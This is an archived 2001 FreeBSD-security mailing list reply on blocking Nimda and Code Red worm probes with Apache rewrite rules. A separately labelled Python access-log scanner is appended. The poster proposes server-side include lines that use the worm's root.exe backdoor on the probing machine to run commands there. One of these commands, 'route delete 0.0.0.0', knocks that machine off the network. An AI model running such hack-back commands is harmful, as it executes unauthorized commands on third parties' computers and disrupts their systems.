Date: Mon, 24 Sep 2001 07:50:17 -0400
From: Paul Chvostek <paul@it.ca>
To: Matthew Seaman <matthew.seaman@tornadogroup.com>
Cc: reladanderse@cs.utah.edu, smithi@nimnet.asn.au, chris@JEAH.net, security@FreeBSD.ORG
Subject: Re: New worm protection
Message-ID: <20010924075017.A7668@gahch.it.ca>
In-Reply-To: <3BAF14F4.E9912F0F@tornadogroup.com>; from matthew.seaman@tornadogroup.com on Mon, Sep 24, 2001 at 12:11:48PM +0100
References: <Pine.BSF.3.96.1010924022816.9322B-100000@gaia.nimnet.asn.au> <200109231703.f8NH3NK24837@faith.cs.utah.edu> <20010923135143.A546@shall.anarcat.dyndns.org> <3BAF14F4.E9912F0F@tornadogroup.com>
Hiya.

On Mon, Sep 24, 2001 at 12:11:48PM +0100, Matthew Seaman wrote:
>
> The Anarcat wrote:
> >
> > On Sun, 23 Sep 2001, David G Andersen wrote:
> >
> > > Lo and behold, Ian Smith once said:
> > > >
> > > > Cute. Will play. However there are other directories too; dumping
> > > > ANY request containing cmd.exe or root.exe would do it best here.
> > >
> > > Use mod_rewrite to redirect all accesses to that script.
> > >
> > >   RewriteEngine on
> > >   RewriteRule .*/cmd.exe.* /scripts/nph-foo.cgi
> > >
> > > (I haven't tested this syntax. Test it first. :)
> >
> > Nice idea! Here's what I did:
> >
> >   RewriteEngine on
> >   RewriteRule .*/cmd.exe.* /nimda.txt
> >   RewriteRule .*/root.exe.* /nimda.txt
> >   RewriteRule .*/default.ida.* /codered.txt
> >   RewriteRule .*/Admin.dll.* /codered.txt
> >   RewriteRule .*\\Admin.dll.* /codered.txt
> >
> > nimda.txt and codered.txt are simply empty files. This reduces the
> > bandwidth used by the attack and removes the entries in error.log.
>
> As has been mentioned elsewhere in this thread, this will cause your server
> to issue a 302 re-direct. Which is probably not the effect intended.
> However, there's no reason to redirect back to your own server. Those of you
> feeling particularly evil may want to consider something along the lines of:
>
>   RewriteEngine on
>   RewriteRule ^/(.*/cmd.exe.*)$ http://%{REMOTE_ADDR}/$1
>
> which is about the closest you can come to "Up yours!" in httpd.conf speak...

This would be all very nice if we could be sure that Nimda was properly
HTTP compliant and respected 302 redirects, but I strongly suspect that
such accurate protocol support was not one of the authors' requirements.

Legality notwithstanding, my vote would be for something like this:

In httpd.conf:

  AddType text/html .ida
  AddHandler server-parsed .ida

And in your ServerRoot, a file called default.ida containing:

  <p>Here's a nickel. Buy yourself a <i>real</i> operating system.</p>
  <!--#exec cmd="/usr/local/bin/lynx -dump http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fix+it+before+script+kiddie+comes+along+and+take+advantage+of+it+again.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live\),+and+install+a+bloody+virus+scanner.+BTW,+your+default+root+has+been+removed.%22 >/dev/null 2>/dev/null" -->
  <!--#exec cmd="/usr/local/bin/lynx -dump http://$REMOTE_HOST/scripts/root.exe\?/c+route+delete+0.0.0.0 >/dev/null 2>/dev/null" -->

Thereby putting a message on the console and taking the machine off the
Internet in a "friendly" way.

--
  Paul Chvostek                                     <paul@it.ca>
  Operations / Development / Abuse / Whatever       vox: +1 416 598-0000
  IT Canada                                         http://www.it.ca/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010924075017.A7668>
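The match list the thread converges on (cmd.exe, root.exe, default.ida, and Admin.dll reached with either slash) is also useful on the detection side: the same signatures run over an access log tell you which hosts are probing you and which worm family they carry. The following Python script is an added example and is not code from the thread, from Apache, or from any of the posters. It parses Apache Common Log Format lines, normalizes each request path (percent-decoding once and folding backslashes to forward slashes so the `\Admin.dll` spelling is caught by the same pattern as `/Admin.dll`), classifies the path as a Nimda or Code Red probe using the nimda.txt / codered.txt split from the thread, and counts probes per source host. The log lines and the documentation-range addresses in `SAMPLE_LOG` are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Probe signatures taken from the rewrite rules in the thread; the worm-family
# mapping follows the nimda.txt / codered.txt split used there.
SIGNATURES = {
    "nimda": r"/cmd\.exe|/root\.exe",
    "codered": r"/default\.ida|/admin\.dll",
}
_PATTERNS = {family: re.compile(rx) for family, rx in SIGNATURES.items()}

# Apache Common Log Format: host ident user [time] "METHOD PATH PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)


def normalize_path(path):
    """Decode percent-encoding once, fold backslashes to forward slashes so
    the 'Admin.dll behind a backslash' variant matches the same pattern as
    '/Admin.dll', and lower-case the result so matching is case-insensitive."""
    return unquote(path).replace("\\", "/").lower()


def classify_request(path):
    """Return 'nimda', 'codered', or None for a raw request path."""
    norm = normalize_path(path)
    for family, pattern in _PATTERNS.items():
        if pattern.search(norm):
            return family
    return None


def scan_access_log(lines):
    """Count worm probes per (family, source host).  Returns the Counter and
    the number of lines that did not parse as Common Log Format."""
    hits = Counter()
    unparsed = 0
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            unparsed += 1
            continue
        family = classify_request(m.group("path"))
        if family is not None:
            hits[(family, m.group("host"))] += 1
    return hits, unparsed


def report(hits):
    """Render the counts as 'family host count' lines, most active first."""
    return [f"{family:8} {host:16} {count}"
            for (family, host), count in hits.most_common()]


# Constructed sample log lines (documentation-range addresses); the paths
# mirror the request shapes the thread's rewrite rules are written against.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Sep/2001:07:50:17 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
192.0.2.10 - - [24/Sep/2001:07:50:18 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210
192.0.2.10 - - [24/Sep/2001:07:50:19 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210
198.51.100.7 - - [24/Sep/2001:08:01:02 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 404 210
198.51.100.7 - - [24/Sep/2001:08:01:03 -0400] "GET /scripts/Admin.dll HTTP/1.0" 404 210
198.51.100.7 - - [24/Sep/2001:08:01:04 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 210
203.0.113.5 - - [24/Sep/2001:08:05:00 -0400] "GET /index.html HTTP/1.0" 200 1043
this line is not in Common Log Format
"""

if __name__ == "__main__":
    hits, unparsed = scan_access_log(SAMPLE_LOG.splitlines())
    print("\n".join(report(hits)))
    print(f"unparsed lines: {unparsed}")
```

Run it against a real access_log by replacing `SAMPLE_LOG.splitlines()` with an open file. Matching is done on the decoded, lower-cased path rather than on the raw request line, which is why the `%5c` probe above is still counted; the same normalized match can drive a mod_rewrite rule with the `[F]` flag, which answers 403 directly instead of issuing the redirect the thread complains about.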